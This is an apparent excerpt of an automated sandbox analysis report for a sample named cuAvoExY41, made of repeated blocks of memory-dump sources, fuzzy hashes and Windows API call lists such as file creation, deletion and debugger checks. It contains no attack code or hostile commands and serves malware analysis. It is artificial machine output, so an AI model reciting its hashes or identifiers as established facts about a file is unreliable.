                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 9f0ad9904c00d1588ca7fee20bbff046ae6cebfadd549be82301ed2cbebdb37e
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 9f0ad9904c00d1588ca7fee20bbff046ae6cebfadd549be82301ed2cbebdb37e
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 91ff5db6bd7d6e0e369f6dae9f283c340b5a01cefbec048736ef3a43e4930830
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 91ff5db6bd7d6e0e369f6dae9f283c340b5a01cefbec048736ef3a43e4930830
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 4b243747ca51e55185e128f97cdef75db13037c81d6d097de4e37640561bcdfd
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 4b243747ca51e55185e128f97cdef75db13037c81d6d097de4e37640561bcdfd
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 84ef7b4a2934e410f02998ed9fa3f1da7029b09242e6ff0a68f30ba49021dab8
                                                          • Instruction ID: 33925563c6725606d792df2b69f917aebf66c2517511b957215c461ad5e4c4c7
                                                          • Opcode Fuzzy Hash: 84ef7b4a2934e410f02998ed9fa3f1da7029b09242e6ff0a68f30ba49021dab8
                                                          • Instruction Fuzzy Hash: FAA001E66AA1D37D321862526E07E7B261EC4C1B25331956EF829A54C1AC84684638B7
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 1ac43b1ef23d37d4552b6465ef55397492a644fa236faf60c1eb96cca96c9699
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: 1ac43b1ef23d37d4552b6465ef55397492a644fa236faf60c1eb96cca96c9699
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 6a3d10c1a340da26bb1128cdea34bb73ecc6c789f912f0e0f35209e673fc76b4
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: 6a3d10c1a340da26bb1128cdea34bb73ecc6c789f912f0e0f35209e673fc76b4
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: a340348aec58da8adfd25e27744030489651295924c0f8dbdb387390591ca78e
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: a340348aec58da8adfd25e27744030489651295924c0f8dbdb387390591ca78e
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 1817a45f7d6351ec8064f20319b6ee58f192caafe3a45dc3e546366e587ca26f
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: 1817a45f7d6351ec8064f20319b6ee58f192caafe3a45dc3e546366e587ca26f
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 49c1be034edcfa93aa78b99dfe65cceed47809b2544ce3f77a9eda4c39588f8f
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: 49c1be034edcfa93aa78b99dfe65cceed47809b2544ce3f77a9eda4c39588f8f
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 5459d271fa466a60ef76b42aa56a11f29728e71a447b6cb75cc9da8fe6ce66d0
                                                          • Instruction ID: e88b55d964d1f0847a459ba5af09d836965933092be5b57ceaee332cdc85a38b
                                                          • Opcode Fuzzy Hash: 5459d271fa466a60ef76b42aa56a11f29728e71a447b6cb75cc9da8fe6ce66d0
                                                          • Instruction Fuzzy Hash: 49A001D7AAA193BC310862A26E07E3B221DC4C5B65335992EF81AC54C1A898586639B2
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 4c1b9dfa2630f02530599185b3c6e43693b73f2555e9d775f078fd668b7b3dc5
                                                          • Instruction ID: e88b55d964d1f0847a459ba5af09d836965933092be5b57ceaee332cdc85a38b
                                                          • Opcode Fuzzy Hash: 4c1b9dfa2630f02530599185b3c6e43693b73f2555e9d775f078fd668b7b3dc5
                                                          • Instruction Fuzzy Hash: 49A001D7AAA193BC310862A26E07E3B221DC4C5B65335992EF81AC54C1A898586639B2
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 8092bd38ab029cca13802555277957c2abc98036adfc6992ea9af9b6a23e44ef
                                                          • Instruction ID: 8bf781e30623f1e4a38c1a1280325b053e6fb5b58af4fbc18e161945e7b5ca29
                                                          • Opcode Fuzzy Hash: 8092bd38ab029cca13802555277957c2abc98036adfc6992ea9af9b6a23e44ef
                                                          • Instruction Fuzzy Hash: 20A011C3AAA0823C300822A22E03E3B220CC0C0B223308A2EF808C00C0A888082238B2
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 0997adc5182ff54fff4ea101883129ec65475fc81e3b45b11071629cf3c39e17
                                                          • Instruction ID: 5a2cf529e0a86084103098aac997aa719d0563dc5ccae971783dd3629117791a
                                                          • Opcode Fuzzy Hash: 0997adc5182ff54fff4ea101883129ec65475fc81e3b45b11071629cf3c39e17
                                                          • Instruction Fuzzy Hash: D9A001D6AAA683BC310862566E07E3B261DC4C6F65374992EF85AC44C5A8845C4638B2
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: f877351d69445d6ac29b02dc757040f69f79332193b6bd7ca2d49c7d2c2e3c6d
                                                          • Instruction ID: 5a2cf529e0a86084103098aac997aa719d0563dc5ccae971783dd3629117791a
                                                          • Opcode Fuzzy Hash: f877351d69445d6ac29b02dc757040f69f79332193b6bd7ca2d49c7d2c2e3c6d
                                                          • Instruction Fuzzy Hash: D9A001D6AAA683BC310862566E07E3B261DC4C6F65374992EF85AC44C5A8845C4638B2
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          APIs
                                                          • SetEndOfFile.KERNELBASE(?,00FB903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00FB9F0C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: File
                                                          • String ID:
                                                          • API String ID: 749574446-0
                                                          APIs
                                                          • SetCurrentDirectoryW.KERNELBASE(?,00FCAE72,C:\Users\user\Desktop,00000000,00FF946A,00000006), ref: 00FCAC08
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: CurrentDirectory
                                                          • String ID:
                                                          • API String ID: 1611563598-0
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00FCC2B1
                                                          • EndDialog.USER32(?,00000006), ref: 00FCC2C4
                                                          • GetDlgItem.USER32(?,0000006C), ref: 00FCC2E0
                                                          • SetFocus.USER32(00000000), ref: 00FCC2E7
                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 00FCC321
                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00FCC358
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00FCC36E
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FCC38C
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FCC39C
                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FCC3B8
                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FCC3D4
                                                          • _swprintf.LIBCMT ref: 00FCC404
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00FCC417
                                                          • FindClose.KERNEL32(00000000), ref: 00FCC41E
                                                          • _swprintf.LIBCMT ref: 00FCC477
                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 00FCC48A
                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00FCC4A7
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00FCC4C7
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FCC4D7
                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FCC4F1
                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FCC509
                                                          • _swprintf.LIBCMT ref: 00FCC535
                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00FCC548
                                                          • _swprintf.LIBCMT ref: 00FCC59C
                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 00FCC5AF
                                                            • Part of subcall function 00FCAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FCAF35
                                                            • Part of subcall function 00FCAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00FEE72C,?,?), ref: 00FCAF84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                          • API String ID: 797121971-1840816070
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB6FAA
                                                          • _wcslen.LIBCMT ref: 00FB7013
                                                          • _wcslen.LIBCMT ref: 00FB7084
                                                            • Part of subcall function 00FB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FB7AAB
                                                            • Part of subcall function 00FB7A9C: GetLastError.KERNEL32 ref: 00FB7AF1
                                                            • Part of subcall function 00FB7A9C: CloseHandle.KERNEL32(?), ref: 00FB7B00
                                                            • Part of subcall function 00FBA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00FB977F,?,?,00FB95CF,?,?,?,?,?,00FE2641,000000FF), ref: 00FBA1F1
                                                            • Part of subcall function 00FBA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FB977F,?,?,00FB95CF,?,?,?,?,?,00FE2641), ref: 00FBA21F
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00FB7139
                                                          • CloseHandle.KERNEL32(00000000), ref: 00FB7155
                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00FB7298
                                                            • Part of subcall function 00FB9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FB73BC,?,?,?,00000000), ref: 00FB9DBC
                                                            • Part of subcall function 00FB9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00FB9E70
                                                            • Part of subcall function 00FB9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00FB95D6,?,?,?,?,?,00FE2641,000000FF), ref: 00FB963B
                                                            • Part of subcall function 00FBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA501
                                                            • Part of subcall function 00FBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA532
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                          • API String ID: 2821348736-3508440684
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog_swprintf
                                                          • String ID: CMT$h%u$hc%u
                                                          • API String ID: 146138363-3282847064
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB2874
                                                          • _strlen.LIBCMT ref: 00FB2E3F
                                                            • Part of subcall function 00FC02BA: __EH_prolog.LIBCMT ref: 00FC02BF
                                                            • Part of subcall function 00FC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FBBAE9,00000000,?,?,?,00010444), ref: 00FC1BA0
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB2F91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                          • String ID: CMT
                                                          • API String ID: 1206968400-2756464174
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FCF844
                                                          • IsDebuggerPresent.KERNEL32 ref: 00FCF910
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FCF930
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00FCF93A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                          • String ID:
                                                          • API String ID: 254469556-0
                                                          • Opcode ID: b6fbf6ad6b779220726939c381c11bd7b2b90c0a7071026aa5db11f7b3d3195e
                                                          • Instruction ID: c7082efab357b3de8dc73a6347f504ddd643ddb37f582c94e1eb69f059d0ebd0
                                                          • Opcode Fuzzy Hash: b6fbf6ad6b779220726939c381c11bd7b2b90c0a7071026aa5db11f7b3d3195e
                                                          • Instruction Fuzzy Hash: BC310975D0521D9BDB10DFA4DD8ABCCFBB8AF04304F1041AEE40DAB250EB759A889F45
                                                          APIs
                                                          • VirtualQuery.KERNEL32(80000000,00FCE5E8,0000001C,00FCE7DD,00000000,?,?,?,?,?,?,?,00FCE5E8,00000004,01011CEC,00FCE86D), ref: 00FCE6B4
                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00FCE5E8,00000004,01011CEC,00FCE86D), ref: 00FCE6CF
                                                          Strings
                                                          Similarity
                                                          • API ID: InfoQuerySystemVirtual
                                                          • String ID: D
                                                          • API String ID: 401686933-2746444292
                                                          • Opcode ID: f272857c5c016f0c0df9e11e89de0c8b4b486200f51159203f0c0497ac95258c
                                                          • Instruction ID: 973bc176a92390001e62d6932f28ec92a6d8a22413514b3e470edd2ab22cd8c5
                                                          • Opcode Fuzzy Hash: f272857c5c016f0c0df9e11e89de0c8b4b486200f51159203f0c0497ac95258c
                                                          • Instruction Fuzzy Hash: E701A772A40109ABDB14DE29DC4DFED7BAAAFC4334F0CC128ED59DB154D638D9059690
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FD8FB5
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FD8FBF
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00FD8FCC
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: a7e9a1c48df833766caceee129d1417151a82a67558a367d8abade91016525ef
                                                          • Instruction ID: dad38afbdc6e73abbe9f6d3fd99f4510085015b6663412a74122bd15e4f7a661
                                                          • Opcode Fuzzy Hash: a7e9a1c48df833766caceee129d1417151a82a67558a367d8abade91016525ef
                                                          • Instruction Fuzzy Hash: 2731D374D0121DABCB21DF64DD89B9CBBB9AF08310F6042EAE41CA7250EB749F859F45
                                                          Similarity
                                                          • API ID:
